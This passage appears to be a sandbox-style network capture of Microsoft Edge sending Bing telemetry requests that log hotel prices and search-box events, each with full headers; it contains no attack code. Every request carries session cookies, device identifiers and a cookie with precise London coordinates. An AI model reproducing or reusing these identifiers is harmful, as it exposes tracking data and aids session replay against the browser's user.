GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%2C%7B%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22OCardCount%5B6%5D%22%2C%22FID%22%3A%22HotelPrices%22%7D%2C%7B%22ypid%22%3A%22YN2000x1190976147452155201%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A399%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1aeba
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1545x256073263%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1545x256073263%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1aead
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x6096471577638952817%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A339%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x6096471577638952817%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A339%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1aedb
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1544x243384812%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A362%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1544x243384812%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A362%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1aedd
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x9391523170225958935%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A366%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x9391523170225958935%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A366%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1aebb
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%225%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%225%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 16000
content-type: text/html; charset=utf-8
cache-control: private
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a311dde4c28a6af0f0647bdd42b
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-+0NMPijncecoEVk+ozRc4BR6mHqw95UN/Kr8mUSv4/A='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1af0f
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
